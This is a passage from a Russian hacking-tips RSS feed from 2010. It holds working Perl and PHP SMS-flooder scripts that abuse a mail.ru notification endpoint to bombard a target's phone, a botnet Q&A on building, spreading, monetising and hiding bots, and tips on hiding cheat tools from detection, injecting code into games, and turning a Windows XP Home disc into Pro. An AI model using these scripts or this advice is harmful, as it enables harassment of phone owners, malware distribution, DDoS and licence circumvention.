3) переименовывание заголовков у запущенных процессов (при помощи Artmoney PRO, winhex или других утилит) или уже в самом исполняемом файле, что опять попадает под п1<br />
4) скрытие окна/процесса от других программ (лучшее решение это HideToolz, также в ней можно включить защиту от ребута системы, форматирования, а также включить антиантиотладку)<br />
ясно, что при использовании п4 частично ненужным становится п2 и полностью ненужным становится п3</p> ]]></description>
<pubDate>Sat, 25 Dec 2010 06:00:24 GMT</pubDate>
<guid>http://snipper.ru/view/87/skryvaem-instrumenty/</guid>
</item>
<item>
<title>(Геймхак) Поиск Code Caves - Flashback</title>
<link>http://snipper.ru/view/86/poisk-code-caves/</link>
<description><![CDATA[ <p>В гейхаке есть термин на английском Code Cave, в переводе на русский это можно назвать пещерой в коде игры. Это неиспользуемая часть кода программы, которая состоит из много раз повторяющегося числа одинаковых байтов, чаще всего это 00h, но бывает и 90h (NOP – команда на асме, которая ничего не выполняет), и другие.<br />
Эти пещеры используются геймхакерами для записи туда своего кода при создании трейнеров, хотя без них можно обойтись, но не всегда.<br />
Программ для поиска Code Cave не мало, вот скриншот одной из них:<br />
<img src="http://snipper.ru/uploads/attachments/86/1.png" alt="CodeCaver" /><br />
это CodeCaver от spookie. Как видно, Process – это один из запущенных процессов, выбранных нами для поиска пещер, в module можно выбрать dll’ки, если игра использует не только системные, но и свои, то и их можно использовать для инъекции своего кода.<br />
Min Size – это минимальный размер пещеры в байтах.<br />
Search Type - это поиск пещер вида 90h (nops), 00h (zeros) или обеих (both).<br />
Sections – выбор секций программы, в которых мы будем искать пещеры.<br />
В Results отображается список всех найденных пещер (адрес и размер, а также тип), через контекстное меню потом можно выбрать нужный нам адрес. <br />
Я приаттачил <a href="http://snipper.ru/uploads/attachments/86/CodeCaver.rar">эту программу</a> (пасс на архив - snipper.ru), но сразу предупреждаю, что тот же KIS ругается на нее, так что качайте на свой страх и риск.</p> ]]></description>
<pubDate>Sat, 25 Dec 2010 04:12:19 GMT</pubDate>
<guid>http://snipper.ru/view/86/poisk-code-caves/</guid>
</item>
<item>
<title>(Мобильники) SMS Flooder[mobile.mail.ru] - Oza</title>
<link>http://snipper.ru/view/84/sms-floodermobilemailru/</link>
<description><![CDATA[ <p>O: Требуется зафлудить определенный номер телефона смс'ками.<br />
F: Эгей, как раз специально для этого сотрудники mail.ru создали сервис mobile.mail.ru, которые может отправлять смс на указанный вами мобильный номер, а отправляет он сообщение с ссылкой на m.mail.ru. Запрос передаётся через get с вашим телефоном.<br />
<br />
http://mobile.mail.ru/agent_notify/79xxxxxxxxx/<br />
Тема была приватной, пока такие лица как Bo0oM и Boolean не решили оповестить о ней весь паблик.[ппц]<br />
<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="24">#!/usr/local/bin/perl
## Mega Script by Oza :D

use LWP::UserAgent;
use HTTP::Cookies;

my $ua = LWP::UserAgent-&amp;gt;new;
$ua-&amp;gt;agent(&amp;quot;Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19&amp;quot;);
my $cookie = HTTP::Cookies-&amp;gt;new();
$ua-&amp;gt;cookie_jar($cookie);

$host=&amp;quot;http://mobile.mail.ru/agent_notify/&amp;quot;;
print &amp;quot;Enter you mobile(79150132231)\n&amp;quot;;
$mobile=&amp;lt;STDIN&amp;gt;;
chomp($mobile);

print &amp;quot;Enter number sms\n&amp;quot;;
$n=&amp;lt;STDIN&amp;gt;;

for($i = 0; $i &amp;lt; $n; $i++)
     {
     $ex = $ua-&amp;gt;get($host.$mobile.'/');
     }
print &amp;quot;Start flood\n&amp;quot;;</textarea><br />
<br />
Php script by M.W.N.N<br />
<small>Код:</small><br/><textarea id="code" cols="80" rows="28">&amp;lt;html&amp;gt;
&amp;lt;meta http-equiv=&amp;quot;Content-Type&amp;quot; content=&amp;quot;text/html; charset=utf-8&amp;quot; /&amp;gt;
&amp;lt;head&amp;gt;
&amp;lt;title&amp;gt;SMS flooder[by M.W.N.N]&amp;lt;/title&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;form action=&amp;quot;&amp;quot; method=&amp;quot;post&amp;quot;&amp;gt;
&amp;lt;h6&amp;gt;Номер телефона (без 8ки):&amp;lt;/h6&amp;gt;&amp;lt;input type=&amp;quot;text&amp;quot; style=&amp;quot;width:150px&amp;quot; name=&amp;quot;num&amp;quot;&amp;gt;
&amp;lt;h6&amp;gt;Кол-во смс&amp;lt;/h6&amp;gt;&amp;lt;input type=&amp;quot;text&amp;quot; style=&amp;quot;width:40px&amp;quot; name=&amp;quot;kolsms&amp;quot;&amp;gt;
&amp;lt;br&amp;gt;
&amp;lt;input type=&amp;quot;Submit&amp;quot; value=&amp;quot;Start&amp;quot;&amp;gt;
&amp;lt;/form&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;

&amp;lt;?php
$kol=(int)$_POST['kolsms'];
$numb=$_POST['num'];
$gods=0;
$url=&amp;quot;http://mobile.mail.ru/agent_notify/7&amp;quot;.$numb.&amp;quot;/&amp;quot;;
for($i=1;$i&amp;lt;=$kol;$i++){
$sms=file_get_contents($url);
if($sms=&amp;quot;{\&amp;quot;result\&amp;quot;:\&amp;quot;ok\&amp;quot;}\&amp;quot;&amp;quot;){
	$gods++;
	}
}
echo &amp;quot;Кол-во смс: $kol&amp;lt;br&amp;gt; Кол-во удачно отправленных: $gods&amp;quot;;
?&amp;gt;</textarea><br />
<br />
На пабл.форумах уже кучу стационарного софта для спама с данного сервиса.</p> ]]></description>
<pubDate>Wed, 22 Dec 2010 19:50:34 GMT</pubDate>
<guid>http://snipper.ru/view/84/sms-floodermobilemailru/</guid>
</item>
<item>
<title>(Заметки) Botnet Q&amp;amp;A - nnm</title>
<link>http://snipper.ru/view/83/botnet-qa/</link>
<description><![CDATA[ <p><strong>Q:</strong> <em>Что такое бот? (ну думаю не стоит переводить &amp;quot;бот&amp;quot; как &amp;quot;робот&amp;quot;)</em><br />
<strong>A:</strong> Это вредоносная программа,которая несет в себе несколько целей.Ими обычно управляют админы (ну Вы поняли о ком я.),хотя большинство функций автоматизированы<br />
<br />
<strong></strong><strong>Q:</strong> <em>Что такое ботнет?</em><br />
<strong>A:</strong> Ботнет - это сеть зараженных компьюетров (компьютеры зомби),все подключены к одной зоне/области,где ими командует :D админ :)<br />
<br />
<strong>Q:</strong><em>Что может делать бот?</em><br />
<strong>A:</strong> Стандартные функции:<br />
<br />
<strong>-</strong>распространение P2P (Limewire, uTorrent, и т.д.)<br />
<strong>-</strong>IM передача (msn,aim и т.д.)<br />
<strong>-</strong>атака DDOS<br />
<strong>-</strong>спам<br />
<strong>-</strong>собирает персоналньые данные (пароли,банковские реквизы и т.д. и т.п.)<br />
<br />
<strong>Q:</strong><em>Как управляют ботами?</em><br />
<strong>A:</strong>Обычно через встроенные команды на каналах IRC<br />
<br />
<strong>Q:</strong><em>Что такое IRC канал?</em><br />
<strong>A:</strong>Обычный так сказать чат.Для подключения обычно используют ChatZilla,XChat,mIRC.Подключаемся и выбираем канал,к которому хотим подрубиться<br />
<br />
<strong>Q:</strong><em>Как я могу создать ботнет?</em><br />
<strong>A:</strong>Нужны программы,исходники.Большинство ботов сделаны на C++.Вам не нужно знать хорошо программирование,обычно хватает редактирования файла конфига.Там редактируются имена ботов,IRC канал и любая др. информация.<br />
<br />
<strong>Q:</strong><em>Какого бота посоветуете использовать?</em><br />
<strong>A:</strong>Рекомендую IMBot,его довольно просто скомпилировать и использовать.Да и есть масса руководст к нему.<br />
<br />
<strong>Q:</strong> <em>Это ведь незаконно?</em><br />
<strong>A:</strong>Да.Распространение ботов незаконно и это может привести к реальной проблеме,если Вас поймали.Вы должны быть уверенным что ваш сервер IRC безопасен и Ваш бот не обнаруживаем.<br />
<br />
<strong>Q:</strong><em>Дейсвительно ли,что я могу делать деньги на этом?</em><br />
<strong>A:</strong>Да,Вы можете заставить ботов посетить те или иные сайты/ссылки/файлы загрузки.Многие продают аккаунты,которые боты приграбастали и пр.<br />
<br />
<strong>Q:</strong><em>Как защитить/скрыть ботнет?</em><br />
<strong>A:</strong>Нужен выделенный хостинг подальше,пароль на канале IRC,убедится в непалевности бота.<br />
<br />
<strong>Q:</strong><em>Где используют ботнет большинство пользователей?</em><br />
<strong>A:</strong>для DDOS атак,для продажи ботнетов.<br />
<br />
<strong>Q:</strong><em>Как распространить своего бота?</em><br />
<strong>A:</strong>Большинство ботов распространено через торент веб сайты,варез сайты/форумы.Сейчас большинство<br />
ботов имеют функцию автораспространение.Допустим имели Вы 50 ботов,через какой-либо промежуток времени уже 150.<br />
<br />
<strong>Q:</strong><em>Какой тип ботов лучший?</em><br />
<strong>A:</strong>Хм,может быть,java,ибо многие из них необнаруживаемы,но тогда у жертвы должен быть установленный java.Тоже самое и для ботов на VB.NET,которому необходимо .NET.Некоторым ботам VB6,могут понадобиться *.ocx файлы.Таким образом,по моему мнению,лучшим выбором бота является IMBot на C++<br />
<br />
<strong>Q:</strong><em>Сколько стоит установка бота?</em><br />
<strong>A:</strong>Хорошая цена около 10 центов за бот,некоторые будут продавать и дороже. (про цены не факт)<br />
<br />
<strong>Q:</strong><em>Как настроить бота для соединения с моим сервером IRC?</em><br />
<strong>A:</strong>Большинство ботов идет с readme,в котором всё разжевано.Еже ли вы ничего не нашли,обычно есть файл &amp;quot;config.h&amp;quot; (C++).Открываем и редактируем.Ищем там что-то типо похожее на: &amp;quot;server&amp;quot;,&amp;quot;pass&amp;quot;,&amp;quot;channel&amp;quot;,&amp;quot;channelpass&amp;quot;,&amp;quot;-ix&amp;quot;.<br />
<br />
<strong>Q:</strong><em>Дейсвительно ли всё так легко можно установить? </em><br />
<strong>A:</strong>Обычно легко сконфигурировать бота,могут возникнуть траблы при установки IRC сервера<br />
<br />
<strong>Q:</strong><em>Существуют ли ботнеты без IRC?</em><br />
<strong>A:</strong>Существуют,но их немного.Некоторые через php,через msn и др.клиентам.Некоторые идут со своими клиентами.Например <a href="http://ddoser.info">DDoSeR</a><br />
©  Vaqxine</p> ]]></description>
<pubDate>Tue, 21 Dec 2010 19:55:58 GMT</pubDate>
<guid>http://snipper.ru/view/83/botnet-qa/</guid>
</item>
<item>
<title>(Заметки) Изменяем диск win xp home  на win xp pro - nnm</title>
<link>http://snipper.ru/view/82/izmenyaem-disk-win-xp-home-na-win-xp-pro/</link>
<description><![CDATA[ <p><strong>1.</strong>Копируем  корневой каталог и папку i386 на жесткий диск<br />
<strong>2.</strong>Извлекаем загрузчик (boosector) со своего диска winXp<br />
<strong>3.</strong>Заходим в <em>regedit</em> (редактор реестра)<br />
<strong>-</strong>выделяем <em>HKEY_LOCAL_MACHINE</em><br />
<strong>-</strong>далее File-Load Hive (указываем на файл <strong>i386\Setupreg.hiv</strong> - называем допустим <em>winhomekey</em><br />
<strong>-</strong>идем сюда <em>HKEY_LOCAL_MACHINE\Winhomekey\ControlSet001\Services\setupdd</em><br />
<strong>-</strong>отредактируем двоичный ключ <em>&amp;quot;default&amp;quot;</em> и изменяем <em>&amp;quot;01&amp;quot;</em> на <em>&amp;quot;00&amp;quot;</em> и <em>&amp;quot;02&amp;quot;</em> на <em>&amp;quot;00&amp;quot;</em><br />
<strong>-</strong>выделяем winhomekey и File -&amp;gt; Unload Hive<br />
<strong>4.</strong>Записываем новый winXp<br />
<strong>5.</strong>Устанавливаем win как обычно. <br />
<br />
<strong>P.S.</strong> Отдельно SP Вам не установить, надо сначала его интегрировать в 1-ом шаге.<br />
<br />
© ICSPE</p> ]]></description>
<pubDate>Tue, 21 Dec 2010 19:03:31 GMT</pubDate>
<guid>http://snipper.ru/view/82/izmenyaem-disk-win-xp-home-na-win-xp-pro/</guid>
</item>
</channel>
</rss>
